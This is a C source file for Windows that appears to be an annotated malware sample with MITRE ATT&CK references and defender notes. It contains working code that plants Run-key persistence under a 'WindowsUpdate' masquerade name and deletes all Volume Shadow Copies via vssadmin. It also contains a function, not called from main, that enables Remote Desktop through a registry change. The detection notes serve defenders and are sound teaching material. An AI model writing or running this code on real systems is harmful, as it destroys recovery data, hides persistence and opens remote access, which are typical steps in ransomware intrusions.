#include <windows.h>
#include <stdio.h>
#include <shlobj.h>
// Logon persistence via the per-user Run key (MITRE ATT&CK T1547.001).
// Stores the path of the running executable as a value named "WindowsUpdate"
// under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, so Windows starts
// the program at each logon of that user. The value name imitates a
// legitimate component, which is a masquerading indicator in its own right.
//
// Defender notes:
//  - Monitor value-set events on this key (e.g. Sysmon Event ID 13) and alert
//    when the data points to a user-writable or otherwise unusual path.
//  - Compare Run-key entries against a known-good baseline; a "WindowsUpdate"
//    entry is suspicious when its target is not a signed system binary.
//  - No return value is checked apart from RegOpenKeyEx, so the routine fails
//    silently and leaves no error output to hunt for.
void AddToRegistry()
{
HKEY hKey;
const char *path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
char exePath[MAX_PATH];
// 1. Get current executable path (NULL module handle = the calling process image)
GetModuleFileName(NULL, exePath, MAX_PATH);
// 2. Open the "Run" registry key under HKCU with write access
if (RegOpenKeyEx(HKEY_CURRENT_USER, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS)
{
// 3. Add a new value "WindowsUpdate" with exe path; the size passed
//    includes the terminating NUL (strlen + 1)
RegSetValueEx(hKey, "WindowsUpdate", 0, REG_SZ, (BYTE *)exePath, strlen(exePath) + 1);
// 4. Close handle
RegCloseKey(hKey);
}
}
// Recovery inhibition (MITRE ATT&CK T1490): passes a vssadmin command to
// system() that deletes all Volume Shadow Copies without prompting. The return
// value of system() is ignored.
//
// Defender notes:
//  - Alert on process creation of vssadmin.exe whose command line contains
//    "delete shadows" (Windows Event ID 4688 with command-line auditing, or
//    Sysmon Event ID 1), especially when the parent chain is cmd.exe launched
//    by a non-administrative tool.
//  - Shadow copies are not a backup strategy on their own; keep offline or
//    immutable backups so this step does not remove the only recovery path.
void destroy_shadow_copy()
{
system("vssadmin delete shadows /all /quiet");
}
// Remote-access enablement attempt: passes a REG ADD command to system() that
// targets the fDenyTSConnections value of the Terminal Server key under HKLM.
// A value of 0 means Remote Desktop connections are not denied. The return
// value of system() is ignored, and nothing in this file calls this function.
//
// Defender notes:
//  - Monitor changes to fDenyTSConnections (registry value-set telemetry such
//    as Sysmon Event ID 13) and reg.exe process creations that name it.
//  - Treat an unexpected change of this value as a lateral-movement
//    precursor (ATT&CK T1112 / T1021.001) and verify against change records.
void create_remote_desktop()
{
system("REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f");
}
// Entry point: runs the persistence step and then the shadow-copy deletion
// step, in that order, and always exits with status 0 whatever the result.
// create_remote_desktop() is defined in this file but is not invoked here.
// For triage, the pairing of a Run-key write with a vssadmin shadow deletion
// from the same process is a stronger signal than either event alone.
int main()
{
AddToRegistry(); // Add to startup registry
destroy_shadow_copy(); // Destroy shadow copies
return 0;
}